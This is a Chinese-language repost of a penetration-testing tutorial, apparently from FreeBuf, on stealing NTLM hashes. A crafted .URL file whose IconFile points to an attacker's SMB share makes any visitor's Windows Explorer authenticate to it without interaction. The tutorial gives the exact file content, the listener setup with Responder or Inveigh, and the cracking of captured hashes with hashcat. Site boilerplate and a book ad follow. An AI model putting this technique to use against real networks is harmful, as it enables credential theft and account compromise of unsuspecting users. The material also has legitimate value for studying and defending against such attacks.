内容简介:这段时间我在微博上翻看了大量的帖子,其中有一篇来自@insertscript的帖子,介绍了一种无交互式抓取哈希值的技巧。其使用.URL文件访问环境变量,用户无需任何用户交互即可连接到攻击者的文件共享。以下内容摘自@insertscript的帖子:“只要explorer.exe的的查看包含.URL文件的文件夹,它就会在发送实际请求之前查找任何指定的环境变量,如%PATH%或%USERNAME%,从而将内容泄露给由攻击者控制的服务器。“(
这段时间我在微博上翻看了大量的帖子,其中有一篇来自@insertscript的帖子,介绍了一种无交互式抓取哈希值的技巧。其使用.URL文件访问环境变量,用户无需任何用户交互即可连接到攻击者的文件共享。
以下内容摘自@insertscript的帖子:
“只要explorer.exe的的查看包含.URL文件的文件夹,它就会在发送实际请求之前查找任何指定的环境变量,如%PATH%或%USERNAME%,从而将内容泄露给由攻击者控制的服务器。“( https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html )
首先,我们在攻击机上设置SMBListener(通常情况下在内网环境中,大多数公司都会阻止SMB流量出站)。
接着,我们在文件共享上创建一个文本文件。(创建文件后,你可以将其放在任何共享上)。
将以下内容粘贴到文本文件中:
[InternetShortcut] URL=whatever WorkingDirectory=whatever IconFile=\\PutYourSmbListenerShareHere\%USERNAME%.icon IconIndex=1
以上你只需将IconFile PATH替换为你在SMBServer,Responder或Inveigh中设置的共享即可。注意:这里的%USERNAME%。icon不要改动。如下:
现在,请确保你已勾选文件名扩展和隐藏文件选项。
使用.URL扩展重命名文件注意:当使用相同文件名时,将导致无法正常工作因此,建议大家每次都只创建唯一的文件名(例如1.url,2.url等)!
重命名后应该看起来像下面这样:
此时,在你的smb listener应该已经获取到了一个连接!
现在,任何人只要访问该共享,都将尝试自动的向你的SMB listener进行身份验证。
复制哈希并使用hashcat破解。
将其粘贴到文件中
启动hashcat(希望密码包含在你的字典列表中)
成功解出了密码!
最后,感谢@insertscript的分享!也希望大家可以在微博上关注我(@_markmo_),我会第一时间向大家分享我学到的东西,就像其他人给予我的一样!
*参考来源: medium ,FB小编secist编译,转载请注明来自FreeBuf.COM
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- JavaScript与HTML交互系列--事件流(冒泡、捕获、应用)和事件处理程序
- js捕获错误信息
- Python捕获所有异常
- Android NativeCrash 捕获与解析
- Wireshark如何捕获USB流量
- 在 Docker 容器中捕获信号
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
How to Solve It
Zbigniew Michalewicz、David B. Fogel / Springer / 2004-03-01 / USD 59.95
This book is the only source that provides comprehensive, current, and detailed information on problem solving using modern heuristics. It covers classic methods of optimization, including dynamic pro......一起来看看 《How to Solve It》 这本书的介绍吧!